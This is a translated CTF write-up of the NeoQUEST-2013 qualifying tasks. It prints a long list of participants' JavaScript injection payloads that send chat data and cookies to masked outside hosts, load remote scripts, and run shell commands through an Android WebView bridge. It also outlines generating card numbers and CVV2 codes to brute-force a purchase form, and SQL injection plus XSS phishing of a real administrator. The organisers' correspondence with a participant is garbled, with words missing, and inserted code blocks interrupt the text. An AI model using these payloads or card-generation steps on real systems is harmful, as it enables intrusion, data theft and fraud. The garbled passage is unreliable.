
Results of the NeoQUEST-2013 qualifying stage and how the tasks are solved

Hello everyone from the NeoQUEST-2013 team!
The qualifying stage is over, and we are happy to sum it up. The results were such that we could not limit ourselves to the planned set of prizes and gifts, because many participants made contributions worth noting.

Below the cut: a summary and a description of the tasks of the NeoQUEST-2013 qualifying stage.

Prizes go to the four participants who completed all the tasks: l33t, vos, AVictor and d90andrew. l33t stands apart: they took part as a team (although the NeoQUEST-2013 qualifying stage assumed individual participation), so we came up with a separate team prize for them (the coolest nanodrome with a bunch of bugs).
Participant AVictor studied the Android task (and not only that one) inside and out and promptly told us about every conceivable and inconceivable cheat, so in addition to the prize (an iPod Touch) we are giving him an extra gift (bugs, bugs, bugs) so that he keeps showing interest in finding bugs everywhere, always and in everything. Participants vos and d90andrew receive an ASUS Transformer Pad Infinity TF700T and an iPod Nano respectively.
Our special "jury's sympathy prize" (an AR.Drone 2.0) goes to participant tavel, who, although he did not complete all the tasks, sorted out the CVV2 generation algorithms (I am glad that experts of this level take part in NeoQUEST) and showed unprecedented zeal in the skipass task.
In addition, all participants who managed to complete the quest will receive memorable gifts from us, which this year will be sweeter and tastier than last year's.

We will personally contact (via the valid e-mail address you gave during registration) all participants who advanced to the second (on-site) round of NeoQUEST-2013, which will take place near St. Petersburg on July 10, 2013, to hand over the prizes and gifts.

Description of the tasks and how to solve them


One page, two pages (analysis of dumps)

The participants were given a traffic dump and a RAM dump. In the traffic, an FTP session transferring a password-protected zip archive containing a key.txt file is easy to locate. All that remains is to find the archive password in the memory dump, which can be done in two ways: a simple one and a very simple one.
The simple way: use the strings utility to extract all Unicode strings and build a dictionary for brute-forcing the password; after that, opening the archive is a purely technical matter.
The very simple way: search the memory dump (Ctrl+F) for the name "key.txt"; the password will be found very close by.
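Both ways in code, as an added example that is not part of the original write-up: the strings extraction mimics `strings -a` / `strings -el`, candidates are ranked by distance from the nearest "key.txt" occurrence, and each is tried as the archive password. The dump bytes and the password are constructed here.

```python
import re
import zipfile
from io import BytesIO

# Constructed stand-in for the RAM dump: zero padding, a dialog string and the
# archive member name in UTF-16LE (how Windows keeps them), the password nearby,
# and an unrelated ASCII string further away. Not taken from the real task files.
DUMP = (b"\x00" * 64 + "Open archive".encode("utf-16le") + b"\x00" * 16
        + "key.txt".encode("utf-16le") + b"\x00" * 24
        + "Tr0ub4dor&3".encode("utf-16le") + b"\x00" * 64
        + b"plain ascii string here\x00" + b"\xff" * 32)

ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")            # like `strings -a`
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")    # like `strings -el`

def strings(dump):
    """Yield (offset, text) for every printable ASCII or UTF-16LE run of 4+ chars."""
    for m in ASCII_RE.finditer(dump):
        yield m.start(), m.group().decode("ascii")
    for m in UTF16_RE.finditer(dump):
        yield m.start(), m.group().decode("utf-16le")

def candidates(dump, anchor="key.txt"):
    """Password dictionary ordered by distance from the nearest occurrence of
    `anchor`, so the 'very simple way' (look next to key.txt) is tried first."""
    found = list(strings(dump))
    anchors = [off for off, s in found if anchor in s]
    ranked = sorted(found, key=lambda it: min((abs(it[0] - a) for a in anchors),
                                              default=len(dump)))
    out = []
    for _, s in ranked:
        if anchor not in s and s not in out:
            out.append(s)
    return out

def crack_zip(zip_bytes, member, words):
    """Return the first word that decrypts `member`, or None. CPython's zipfile
    raises RuntimeError on a wrong password for an encrypted entry."""
    with zipfile.ZipFile(BytesIO(zip_bytes)) as zf:
        for w in words:
            try:
                with zf.open(member, pwd=w.encode()) as f:
                    f.read(1)
                return w
            except RuntimeError:
                continue
    return None
```

With a real dump, `candidates(open("mem.dmp", "rb").read())` followed by `crack_zip(open("archive.zip", "rb").read(), "key.txt", words)` is the whole procedure; note zipfile only reads ZipCrypto, not AES-encrypted archives.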

The cost of a message is 18 c.u. excluding VAT (Android application reversing + JavaScript via SMS)

The extrovert bot, whom we tried to ignore while developing the task, gladly handed out its mobile number to everyone it chatted with in order to get more messages; after all, it sat in the chat both from the web front-end and from the phone.

image

To please the poor fellow with attention, one had to send an SMS, and if it passed a regular expression, it was immediately added to the chat as an incoming message.
Besides this feature, the application implemented transferring a file from the SD card to the interlocutor via the server (which, by the way, gave rise to a serious cheat involving a shell upload that even the hosting providers noticed).
The interface of the Android application is a WebView, and all that was missing from it was a big red "send file" button, so the function had to be called on its own via JavaScript, which could be pushed through SMS without any restrictions. But not every piece of JavaScript inserted this way gets executed; since the Android bot was almost like a person (just as terribly curious and fearless), it gladly clicked on all incoming buttons.
Algorithm for solving the task:

image

Here are some of the options participants sent:


 . NQC fob: <img src=http://xxx.xxx.xxx.xxx:xxxx/inject> 

 . NQC fob: ");var c =["my","your"];for(var k = 0; k < 2; k++){var msgs=document.getElementsByClassName(c[k]);for (var i = 0; i < msgs.length;i++){var cname = msgs[i].className;var childs=msgs[i].children;for(var j = 0; j < childs.length; j++)appendText("<img src=http://xxx.xxx.xxx.xxx:xxxx/"+cname+"/"+encodeURIComponent(childs[j]. innerText)+">");}};show("fob 

 . NQC fob: ");var e=document.getElementsByClassName("tab");for(var i=0;i<e.length;i++)appendText("<img src=http://xxx.xxx.xxx.xxx:xxxx/"+encodeURIComponent(e[i].title)+">");show("admin 

 1 NQC Contacts:<img src="http://xxx.xxx.xxx/d.php" 

 1 NQC fob:","my");var i=new Image();i.src="http://xxx.xxx.xxx/d.php?d="+escape(findTab("fob").innerHTML);appendMsg("x"," 

 1 NQC fob:","my");var x=new XMLHttpRequest();x.open('POST','http://xxx.xxx.xxx/d.php',true);x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send("a="+encodeURIComponent(document.getElementsByTagName('body')[0].innerHTML));appendMsg("x"," 

 1 NQC x:","my");var s=document.createElement('script');s.src='http://xxx.xxx.xxx/1.txt';document.getElementsByTagName('head')[0].appendChild(s);clr(" 

 1 NQC x:","my");var s=escape(document.getElementsByTagName('body')[0].innerHTML);for(i=0;i<s.length;i+=99)window.Android.postMessage(s.substr(i,99),"_");clr(" 

 1 NQC fob:","my");var i=new Image();i.src="http://xxx.xxx.xxx/d.php?d="+escape(findTab("Contacts").innerHTML);appendMsg("x"," 

 1 NQC x:","my");var s=escape(findTab("Contacts").innerHTML);for(i=0;i<s.length;i+=99)window.Android.postMessage(s.substr(i,99),"_");clr(" 

 1 NQC x:","my");var s=document.createElement('script');s.src='http://xxx.xxx.xxx/d.php';document.getElementsByTagName('head')[0].appendChild(s);clr(" 

 1 NQC fob:<img src=\"http://xxx.xxx.xxx/d.php\"/> 

 1 NQC fob:","my");window.Android.sendFile("key.txt","AVictor");clr(" 

 Q NQC " eval('q=new Image();q.src="http://xxx.xxx.xxx/image.php?" document.cookie;') " 

 . NQC fob: "); document.body.innerHTML="<iframe width=100% height=100% frameborder=0 src=http://xxx.xxx.xxx.xxx:xxxx/l.html></iframe>";// 

 Q NQC <img src="http://xxx.xxx.xxx/image.php?qwe"/>:hello 

 Q NQC <img src="http://xxx.xxx.xxx/image.php?123">:hello 

 Q NQC " eval('i=new Image();i.src="http://xxx.xxx.xxx/image.php?' document.cookie '";') ":hello 

 Q NQC hello:<img src="http://xxx.xxx.xxx/image.php?qwe1"/> 

 Q NQC " eval(';i=new Image();i.src="http://xxx.xxx.xxx/image.php?'; document.cookie ';";';) ":hello 

 . NQC test: ");function snd(i){var c = "";var b = i.read();while(b != -1) {var s = String.fromCharCode(b);c += s;b = i.read();if(b<0 || (s=="\\n" && c.length>512)) {document.body.innerHTML+="<img src=http://xxx.xxx.xxx.xxx:xxxx/?"+encodeURIComponent(c)+">";c=""; }}}rt=Android.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null). invoke(null,null);snd(rt.exec(["/system/bin/ls","-R","/sdcard/"]).getInputStream());; show("test 

 . NQC test: ");function snd(i){var c = "";var b = i.read();while(b != -1) {var s = String.fromCharCode(b);c += s;b = i.read();if(b<0 || c.length>31) {document.body.innerHTML+="<img src=http://xxx.xxx.xxx.xxx:xxxx/?"+encodeURIComponent(c)+">";c=""; }}}rt=Android.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null). invoke(null,null);snd(rt.exec(["/system/bin/ls","-R","/sdcard/"]).getInputStream());; show("test 

 . NQC test: ");function snd(fn, i){var c = "";var b = i.read();while(b != -1) {var s = String.fromCharCode(b);c += s;b = i.read();if(b<0 || c.length > 32) {document.body.innerHTML+="<img src=http://xxx.xxx.xxx.xxx:xxxx/"+fn+"?"+encodeURIComponent(c)+">";c=""; }}}rt = Android.getClass().forName("java.lang.Runtime").getMethod( "getRuntime",null).invoke(null,null);snd("f", rt.exec(["/system/bin/cat", "/sdcard/flag"]).getInputStream());snd("ft", rt.exec(["/system/bin/cat", "/sdcard/flag.txt"]).getInputStream());snd("k", rt.exec(["/system/bin/cat", "/sdcard/key"]).getInputStream());snd("kt", rt.exec(["/system/bin/cat", "/sdcard/key.txt"]).getInputStream());;show("test 

 . NQC xxx: ");Android.postMessage("xxx", "/, /.txt, key, key.txt"); // 

 . NQC xxx: ");Android.postMessage("xxx", "/./.txt.key.key.txt"); // 

 . NQC fob: ");Android.postMessage("file:///android_asset/key.txt", "xxx"); //;Android.postMessage( "xxx");"<img src=http://xxx.xxx.xxx.xxx:xxxxx/" fn "?" encodeURIComponent(c) ">"; -> {Android.postMessage( 

 . NQC test: ");function snd(fn, i){var c = "";var b = i.read();while(b != -1) {var s = String.fromCharCode(b);c = s;b = i.read();if(b<0 


Well, some people gave it some thought. In total, about 200 SMS messages arrived (we should have hooked up a premium short number and earned a bit on the side).
Some even wanted to talk by voice! It turned out to be a fun task.

There and back again (carding)

We discussed the solution of this task productively with participant tavel, and it is better than anything we could write about the task ourselves. The correspondence is given almost unchanged, only slightly shortened (I hope tavel does not object and will not drag me through the courts):

tavel --------> NeoQUEST_support
 -,   -  BIN,    , 479768  479769,    BIN  : 479768;VISA;BANK SAINT PETERSBURG PLC;DEBIT;CLASSIC;RUSSIAN FEDERATION;RU;RUS;643;; 479769;VISA;BANK SAINT PETERSBURG PLC;DEBIT;CLASSIC;RUSSIAN FEDERATION;RU;RUS;643;; 479770;VISA;BANK SAINT PETERSBURG PLC;DEBIT;BUSINESS;RUSSIAN FEDERATION;RU;RUS;643;; 479771;VISA;BANK SAINT PETERSBURG PLC;CREDIT;PLATINUM;RUSSIAN FEDERATION;RU;RUS;643;; 479772;VISA;BANK SAINT PETERSBURG PLC;DEBIT;ELECTRON;RUSSIAN FEDERATION;RU;RUS;643;; 479773;VISA;BANK SAINT PETERSBURG PLC;DEBIT;PREMIER;RUSSIAN FEDERATION;RU;RUS;643;;  ,   BIN   . ,    479769,        ,  -  . , ..     4 ,    BIN  1000 ,   ,          .      2000 . -:      CVV2 ,   CVV, CVV2      ,  CVV    1-   ,          .    CVV,   label    "CVV2/CVC2",  placeholder CVV,  , ,          .     ,   (http://dmitryga.ru/2013/640): CVV = 3DES(PAN[9], MMYY, ServiceCode) CVV2 = 3DES(PAN[9], YYMM, 000) -,     , -,   CVV2 -  ,    000. ,  -      101  , ,       CVV2. ,    (PAN)   9  ( BIN    ),   16 ,   2     ,   8 , .. 64- ,    64- ,         .    ,     :  3DES    1- ,   2-      1- , ..  EDE   ,    , , EEE,       -   ,   ,    EDE2. 

NeoQUEST_support ------> tavel
    CVV  CVV2,   ,     (   EDE ).  ,     PAN,      128 ,            DES-  XOR-  .   .   .     CVV, ..       ( CVV2)  ,      . 

Solution steps:
1. Log in to the site (nick / nick).

image

2. Find out the BIN (IIN) of Bank Saint Petersburg. 479769 can be found via Google. You can get other BINs only if you have back channels (as tavel apparently does) to the officially closed current BIN list.
3. Use the Luhn algorithm and a CVV2 generation algorithm (for example, CVV2 = 3DES(PAN[9], YYMM, 000)) to generate PAN/CVV pairs. The EFT Calculator program, with its source code slightly modified, could be used for this.
4. Go through (not manually, of course) all several thousand options on the site via the ticket-purchase form. When the correct data is entered, the key is sent to the e-mail address you specified.

image

My first MP3 player (audio steganography)

Simple file manipulations can help hide transmitted information, especially if you don't know where to look for it. We narrowed the search area a little so that participants were not looking for a needle in a haystack: "Nick lost the first 5 seconds, then a couple more seconds of the track from 2:40 and finally the last fragment from 3:42." This, of course, greatly simplified the task.
The word embedded in the mp3 file was split into three parts.
The first segment is the word "RUM". We produced this word with a speech synthesizer, then slowed it down and reversed it. Accordingly, the participants faced the reverse task.
The second segment is the word "GINAE". It was encoded in Morse code and strongly sped up. If you listen to the segment carefully, you can hear it right away; then slow the track down on this segment and decode the Morse code.
The third segment is the word "IMA". In this segment we cut out a certain frequency range and inserted Morse code recorded at that frequency. The Morse sounded only in one channel and was muffled, so it was very hard to hear it either with the naked ear or with tools, without special manipulation. A hint was left in the mp3 tags indicating the working frequency range of the Morse code: "Riped by fans for fans. Enjoy in 800-1000." If you use a parametric equalizer, for example in Sound Forge, to boost the needed frequencies, you can hear the Morse code and, after decoding it, get the desired fragment.

image

The result is the word IMAGINAERUM, the name of one of the albums of the band Nightwish, the favourite band of the task's author =). key = MD5(IMAGINAERUM)
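The third segment's extraction done in code, as an added example that is not from the original task or its files: a constructed stereo clip carries a loud 300 Hz "music" tone in both channels and quiet Morse at 900 Hz only in the right channel; the decoder measures 800-1000 Hz energy per frame with a Goertzel filter (the equalizer step) and turns the on/off runs back into letters. Sample rate, dot length and tone are assumptions.

```python
import math
from itertools import groupby
RATE, UNIT = 8000, 0.06                 # sample rate (Hz) and Morse dot length (s), assumed
BAND = (800.0, 900.0, 1000.0)           # the range named in the tag hint "Enjoy in 800-1000"
MORSE = {".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F", "--.": "G",
         "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L", "--": "M", "-.": "N",
         "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R", "...": "S", "-": "T", "..-": "U",
         "...-": "V", ".--": "W", "-..-": "X", "-.--": "Y", "--..": "Z"}
ENCODE = {v: k for k, v in MORSE.items()}
def synth(text, tone=900.0):
    """Constructed clip: loud 300 Hz 'music' in both channels, quiet Morse in the right one."""
    out = []                            # list of (left, right) samples
    def seg(on, units):
        for _ in range(int(units * UNIT * RATE)):
            t = len(out) / RATE
            music = 0.8 * math.sin(2 * math.pi * 300 * t)
            morse = 0.2 * math.sin(2 * math.pi * tone * t) if on else 0.0
            out.append((music, music + morse))
    for ch in text:
        for sym in ENCODE[ch]:
            seg(True, 1 if sym == "." else 3)
            seg(False, 1)               # gap inside a letter: 1 unit
        seg(False, 2)                   # letter gap: 3 units in total
    return out
def goertzel_power(frame, freq):
    """Signal power at one frequency: the narrow-band 'equalizer' step done in code."""
    k, s1, s2 = 2 * math.cos(2 * math.pi * freq / RATE), 0.0, 0.0
    for x in frame:
        s1, s2 = x + k * s1 - s2, s1
    return s1 * s1 + s2 * s2 - k * s1 * s2
def decode(stereo, channel=1, frame=80):
    """Per 10 ms frame of one channel: 800-1000 Hz power -> on/off runs -> dots, dashes, gaps."""
    mono = [s[channel] for s in stereo]
    energy = [sum(goertzel_power(mono[i:i + frame], f) for f in BAND)
              for i in range(0, len(mono) - frame + 1, frame)]
    thresh = max(energy) / 2
    runs = [(on, len(list(g))) for on, g in groupby(e > thresh for e in energy)]
    dash = 2 * UNIT * RATE / frame      # longer than two dots: a dash, or a letter gap
    letters, cur = [], ""
    for on, length in runs:
        if on:
            cur += "-" if length > dash else "."
        elif cur and length > dash:
            letters.append(MORSE.get(cur, "?"))
            cur = ""
    if cur:
        letters.append(MORSE.get(cur, "?"))
    return "".join(letters)
```

Decoding the left channel (channel=0) yields nothing useful, which is exactly why the hint about a single channel and a frequency range mattered.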

If there is a pack of cigarettes in your pocket (stealth server)

For this task we used a server running our own build of the FebOS operating system, which simply had no TCP/IP stack, or any protocol stack at all, so it did not respond to any requests except one: UDP on port 2112. We added delays to the responses to messages arriving on this port, with the result that many utilities (nmap in particular) stopped detecting the port as open. It can be detected by running any scanner over all UDP ports and looking at the answers in Wireshark (only one will come back, from port 2112). With that, the main part of the task is solved; the rest is a matter of technique and entertainment. You need to work out the XML protocol with the server from its prompts:
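As an added illustration (not from the original task or its server), the following Python runs a local UDP service that mimics the delayed reply on port 2112 and scans it twice: once with the short wait most scanners allow per probe, once listening long enough for the late answer to show up. The greeting, delay and port range are assumptions.

```python
import socket
import threading
import time

HOST = "127.0.0.1"      # everything runs locally; the stealth server is a constructed stand-in

def stealth_server(port, delay, stop):
    """Answer only on `port`, and only after `delay` seconds (the task's trick)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, port))
    srv.settimeout(0.2)
    while not stop.is_set():
        try:
            _, peer = srv.recvfrom(2048)
        except socket.timeout:
            continue
        time.sleep(delay)                 # longer than a typical per-probe UDP timeout
        srv.sendto(b"<hello/>", peer)     # assumed greeting; the real XML is not in the write-up
    srv.close()

def scan_udp(ports, listen_for):
    """Probe every port from one socket, then keep listening for `listen_for` seconds
    and return the set of ports whose reply eventually arrived (what Wireshark shows)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((HOST, 0))
    sock.settimeout(0.1)
    for p in ports:
        sock.sendto(b"?", (HOST, p))
    answered, deadline = set(), time.monotonic() + listen_for
    while time.monotonic() < deadline:
        try:
            _, (_, port) = sock.recvfrom(2048)
            answered.add(port)
        except OSError:                   # timeout, or ICMP unreachable from a closed port
            continue
    sock.close()
    return answered

def demo(listen_for, port=2112, delay=1.0, ports=range(2110, 2116)):
    """Start the server in a thread and scan it: a window shorter than the reply delay
    misses the port, a longer one finds it."""
    stop = threading.Event()
    t = threading.Thread(target=stealth_server, args=(port, delay, stop), daemon=True)
    t.start()
    time.sleep(0.1)                       # let the server bind before probing
    try:
        return scan_udp(ports, listen_for)
    finally:
        stop.set()
        t.join()
```

A scanner that decides per probe within its own timeout can at best report such a port as open|filtered; listening well past the delay, as the Wireshark capture did for the participants, is what reveals it.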

image
(picture of the participant vos)

And beat the bot at gomoku:

image
(picture of the participant vos)

“New Year is not a holiday for us” (c) Russian Post (web security)

This task almost completely reproduced the situation on a real, rather large site that we recently pentested. Life invents everything for us; we just don't spoil it.
The entry point is an SQL injection, which yields information about the site administrators (e-mail addresses and password hashes).
In addition to the SQL injection, the site has a passive (reflected) XSS. Using social engineering, it was possible to get the administrator (the admin was real, working from 10:00 to 18:00 and sometimes almost around the clock) to click a link containing the XSS, enter credentials, and thus send you the login and password. Many of the participants who completed the task this way stubbornly tried to steal cookies and did not want to use social engineering at all, although in real life it is most often the person who is the weakest link.
We took the site administrators' passwords, like the whole task, from real life: not extremely complex, but not dictionary words either (average length, containing digits, letters, symbols, etc.). Therefore, having obtained the administrators' password hashes, one could quite successfully recover them from the MD5 hashes, which some participants did.

Off the longing, under the feet of the board! (SCADA-system + search by pictures)

Acknowledgments

Thanks to all participants! We hope you enjoyed it and that everyone learned something new and useful. I am glad that all the tasks were solved, for which a special thank you to all the winners. We will meet you at the NeoQUEST-2013 on-site stage, and wish you good luck in advance!

Thanks to the whole team involved in creating the tasks: ainchorn, otanatari, macoeshka, bozzzon, denys, sergy, 3ka5_cat and others. Special thanks to pushkin for supporting the entire infrastructure and, of course, to Xandra for the excellent hospital design.

Source: https://habr.com/ru/post/170679/
